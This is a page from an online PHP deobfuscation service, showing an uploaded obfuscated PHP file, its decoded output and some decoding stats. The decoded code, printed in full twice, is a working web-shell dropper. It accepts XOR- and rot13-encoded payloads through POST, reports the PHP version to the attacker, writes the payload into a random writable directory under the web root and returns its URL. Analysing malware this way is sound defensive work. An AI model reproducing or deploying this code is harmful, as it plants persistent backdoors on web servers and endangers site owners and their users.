Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $oqhfktjwxzi = "wugfqpygiqmdpcya";$eftytxplq = "";foreach ($_POST as $nksdnrlqos => ..

Decoded Output download

<?php $oqhfktjwxzi = "wugfqpygiqmdpcya";$eftytxplq = "";foreach ($_POST as $nksdnrlqos => $aoeabnrxss){if (strlen($nksdnrlqos) == 16 and substr_count($aoeabnrxss, "%") > 10){iuahhcj($nksdnrlqos, $aoeabnrxss);}}function iuahhcj($nksdnrlqos, $oxgpi){global $eftytxplq;$eftytxplq = $nksdnrlqos;$oxgpi = str_split(rawurldecode(str_rot13($oxgpi)));function ghhas($munmimxopj, $nksdnrlqos){global $oqhfktjwxzi, $eftytxplq;return $munmimxopj ^ $oqhfktjwxzi[$nksdnrlqos % strlen($oqhfktjwxzi)] ^ $eftytxplq[$nksdnrlqos % strlen($eftytxplq)];}$oxgpi = implode("", array_map("ghhas", array_values($oxgpi), array_keys($oxgpi)));$oxgpi = @unserialize($oxgpi);if (@is_array($oxgpi)){$nksdnrlqos = array_keys($oxgpi);$oxgpi = $oxgpi[$nksdnrlqos[0]];if ($oxgpi === $nksdnrlqos[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function nsodqcv($oqhfkir) {static $znxjcd = array();$xaovwzuu = glob($oqhfkir . '/*', GLOB_ONLYDIR);if (count($xaovwzuu) > 0) {foreach ($xaovwzuu as $oqhfk){if (@is_writable($oqhfk)){$znxjcd[] = $oqhfk;}}}foreach ($xaovwzuu as $oqhfkir) nsodqcv($oqhfkir);return $znxjcd;}$ajfxc = $_SERVER["DOCUMENT_ROOT"];$xaovwzuu = nsodqcv($ajfxc);$nksdnrlqos = array_rand($xaovwzuu);$qizcvol = $xaovwzuu[$nksdnrlqos] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($qizcvol, $oxgpi);echo "http://" . $_SERVER["HTTP_HOST"] . substr($qizcvol, strlen($ajfxc));exit();}}} ?>

Did this file decode correctly?

Original Code

<?php $oqhfktjwxzi = "wugfqpygiqmdpcya";$eftytxplq = "";foreach ($_POST as $nksdnrlqos => $aoeabnrxss){if (strlen($nksdnrlqos) == 16 and substr_count($aoeabnrxss, "%") > 10){iuahhcj($nksdnrlqos, $aoeabnrxss);}}function iuahhcj($nksdnrlqos, $oxgpi){global $eftytxplq;$eftytxplq = $nksdnrlqos;$oxgpi = str_split(rawurldecode(str_rot13($oxgpi)));function ghhas($munmimxopj, $nksdnrlqos){global $oqhfktjwxzi, $eftytxplq;return $munmimxopj ^ $oqhfktjwxzi[$nksdnrlqos % strlen($oqhfktjwxzi)] ^ $eftytxplq[$nksdnrlqos % strlen($eftytxplq)];}$oxgpi = implode("", array_map("ghhas", array_values($oxgpi), array_keys($oxgpi)));$oxgpi = @unserialize($oxgpi);if (@is_array($oxgpi)){$nksdnrlqos = array_keys($oxgpi);$oxgpi = $oxgpi[$nksdnrlqos[0]];if ($oxgpi === $nksdnrlqos[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function nsodqcv($oqhfkir) {static $znxjcd = array();$xaovwzuu = glob($oqhfkir . '/*', GLOB_ONLYDIR);if (count($xaovwzuu) > 0) {foreach ($xaovwzuu as $oqhfk){if (@is_writable($oqhfk)){$znxjcd[] = $oqhfk;}}}foreach ($xaovwzuu as $oqhfkir) nsodqcv($oqhfkir);return $znxjcd;}$ajfxc = $_SERVER["DOCUMENT_ROOT"];$xaovwzuu = nsodqcv($ajfxc);$nksdnrlqos = array_rand($xaovwzuu);$qizcvol = $xaovwzuu[$nksdnrlqos] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($qizcvol, $oxgpi);echo "http://" . $_SERVER["HTTP_HOST"] . substr($qizcvol, strlen($ajfxc));exit();}}}

Function Calls

None

Variables

$eftytxplq
$oqhfktjwxzi wugfqpygiqmdpcya

Stats

MD5 4d46d5356aee749a70964e512a18bfe0
Eval Count 0
Decode Time 91 ms